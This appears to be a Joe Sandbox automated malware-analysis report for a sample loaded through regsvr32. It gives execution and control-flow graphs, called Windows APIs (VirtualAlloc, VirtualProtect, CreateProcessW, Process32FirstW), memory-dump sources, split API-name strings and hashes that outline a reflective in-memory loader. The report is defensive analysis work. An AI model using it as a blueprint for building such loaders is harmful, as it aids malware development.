                                                                                                        execution_graph 3185 2910000 3188 291015a 3185->3188 3186 291033f GetNativeSystemInfo 3187 2910377 VirtualAlloc 3186->3187 3190 29108eb 3186->3190 3193 2910395 3187->3193 3188->3186 3188->3190 3189 2910873 3189->3190 3191 29108c6 RtlAddFunctionTable 3189->3191 3191->3190 3192 291084b VirtualProtect 3192->3193 3193->3189 3193->3192 3194 18000be34 3197 180005db4 3194->3197 3196 18000bf4c 3198 180005df9 3197->3198 3199 1800060dd Process32FirstW 3198->3199 3200 180005e61 3198->3200 3199->3198 3200->3196 3220 1800096b8 3221 1800096f2 3220->3221 3222 18000971e 3221->3222 3224 18000be34 3221->3224 3225 180005db4 Process32FirstW 3224->3225 3226 18000bf4c 3225->3226 3226->3221 3201 18000d1ca 3202 18000d3e6 3201->3202 3204 18000d1d3 3201->3204 3205 180015b18 3202->3205 3207 180015b4c 3205->3207 3208 1800160d6 3207->3208 3209 18000741c 3207->3209 3208->3204 3210 18000745d 3209->3210 3213 1800284b0 3210->3213 3212 1800075fe 3212->3207 3215 180028554 3213->3215 3214 180028653 CreateProcessW 3214->3212 3215->3214 3231 18001d32c 3232 18001d36d 3231->3232 3233 18001d706 3232->3233 3234 18000be34 Process32FirstW 3232->3234 3234->3232 3239 18000f3e0 3242 18000f41e 3239->3242 3240 18000741c CreateProcessW 3241 18000fdb1 3240->3241 3242->3240 3242->3241

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 2910000-291029a call 291091c * 2 13 29102a0-29102a4 0->13 14 2910905 0->14 13->14 15 29102aa-29102ae 13->15 16 2910907-291091a 14->16 15->14 17 29102b4-29102b8 15->17 17->14 18 29102be-29102c5 17->18 18->14 19 29102cb-29102dc 18->19 19->14 20 29102e2-29102eb 19->20 20->14 21 29102f1-29102fc 20->21 21->14 22 2910302-2910312 21->22 23 2910314-291031a 22->23 24 291033f-2910371 GetNativeSystemInfo 22->24 25 291031c-2910324 23->25 24->14 26 2910377-2910393 VirtualAlloc 24->26 27 2910326-291032a 25->27 28 291032c-291032d 25->28 29 2910395-29103a8 26->29 30 29103aa-29103ae 26->30 33 291032f-291033d 27->33 28->33 29->30 31 29103b0-29103c2 30->31 32 29103dc-29103e3 30->32 34 29103d4-29103d8 31->34 35 29103e5-29103f9 32->35 36 29103fb-2910417 32->36 33->24 33->25 38 29103c4-29103d1 34->38 39 29103da 34->39 35->35 35->36 40 2910419-291041a 36->40 41 2910458-2910465 36->41 38->34 39->36 42 291041c-2910422 40->42 43 2910537-2910542 41->43 44 291046b-2910472 41->44 45 2910424-2910446 42->45 46 2910448-2910456 42->46 47 29106e6-29106ed 43->47 48 2910548-2910559 43->48 44->43 49 2910478-2910485 44->49 45->45 45->46 46->41 46->42 52 29106f3-2910707 47->52 53 29107ac-29107c3 47->53 50 2910562-2910565 48->50 49->43 51 291048b-291048f 49->51 58 2910567-2910574 50->58 59 291055b-291055f 50->59 60 291051b-2910525 51->60 54 29107a9-29107aa 52->54 55 291070d 52->55 56 29107c9-29107cd 53->56 57 291087a-291088d 53->57 54->53 63 2910712-2910736 55->63 64 29107d0-29107d3 56->64 80 29108b3-29108ba 57->80 81 291088f-291089a 57->81 61 291057a-291057d 58->61 62 291060d-2910619 58->62 59->50 65 2910494-29104a8 60->65 66 291052b-2910531 60->66 61->62 69 2910583-291059b 61->69 73 29106e2-29106e3 62->73 74 291061f 62->74 90 2910796-291079f 63->90 91 2910738-291073e 63->91 71 29107d9-29107e9 64->71 72 291085f-291086d 64->72 67 29104aa-29104cd 65->67 68 29104cf-29104d3 65->68 66->43 66->51 75 2910518-2910519 67->75 76 29104e3-29104e7 68->76 77 29104d5-29104e1 68->77 69->62 78 291059d-291059e 69->78 82 29107eb-29107ed 71->82 83 291080d-291080f 71->83 72->64 85 2910873-2910874 72->85 73->47 84 2910625-2910648 74->84 75->60 88 29104e9-29104fc 76->88 89 29104fe-2910502 76->89 86 2910511-2910515 77->86 87 29105a0-2910605 78->87 95 29108eb-2910903 80->95 96 29108bc-29108c4 80->96 92 29108ab-29108b1 81->92 93 29107fb-291080b 82->93 94 29107ef-29107f9 82->94 97 2910811-2910820 83->97 98 2910822-291082b 83->98 111 29106b2-29106b7 84->111 112 291064a-291064b 84->112 85->57 86->75 87->87 99 2910607 87->99 88->86 89->75 106 2910504-291050e 89->106 90->63 105 29107a5-29107a6 90->105 100 2910740-2910746 91->100 101 2910748-2910754 91->101 92->80 102 291089c-29108a8 92->102 107 291082e-291083d 93->107 94->107 95->16 96->95 104 29108c6-29108e9 RtlAddFunctionTable 96->104 97->107 98->107 99->62 108 291077b-291078d 100->108 109 2910764-2910776 101->109 110 2910756-2910757 101->110 102->92 104->95 105->54 106->86 113 291084b-291085c VirtualProtect 107->113 114 291083f-2910845 107->114 108->90 126 291078f-2910794 108->126 109->108 117 2910759-2910762 110->117 119 29106b9-29106bd 111->119 120 29106ce-29106d8 111->120 118 291064e-2910651 112->118 113->72 114->113 117->109 117->117 123 2910653-2910659 118->123 124 291065b-2910666 118->124 119->120 121 29106bf-29106c3 119->121 120->84 125 29106de-29106df 120->125 121->120 130 29106c5 121->130 127 291068d-29106a3 123->127 128 2910676-2910688 124->128 129 2910668-2910669 124->129 125->73 126->91 133 29106a5-29106aa 127->133 134 29106ac 127->134 128->127 131 291066b-2910674 129->131 130->120 131->128 131->131 133->118 134->111
                                                                                                        APIs
                                                                                                        • GetNativeSystemInfo.KERNELBASE ref: 02910344
                                                                                                        • VirtualAlloc.KERNELBASE ref: 0291038A
                                                                                                        • VirtualProtect.KERNELBASE ref: 0291085C
                                                                                                        • RtlAddFunctionTable.KERNEL32 ref: 029108E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.415136043.0000000002910000.00000040.00001000.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2910000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                        • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                        • API String ID: 998211078-3605381585
                                                                                                        • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction ID: 56843f193d8477b01f04ac17ce6dc9e1691871be6c77b7d0f5ffac040750e5a0
                                                                                                        • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction Fuzzy Hash: 3B520230A18B4C8BD719DF19D8857BAB7E1FB84304F14462DE88BC7251EB35E586CB86
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 399 1800284b0-18002857e call 180011408 402 180028653-18002868d CreateProcessW 399->402 403 180028584-18002864d call 18000f174 399->403 403->402
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.415208554.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_180001000_regsvr32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                        • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%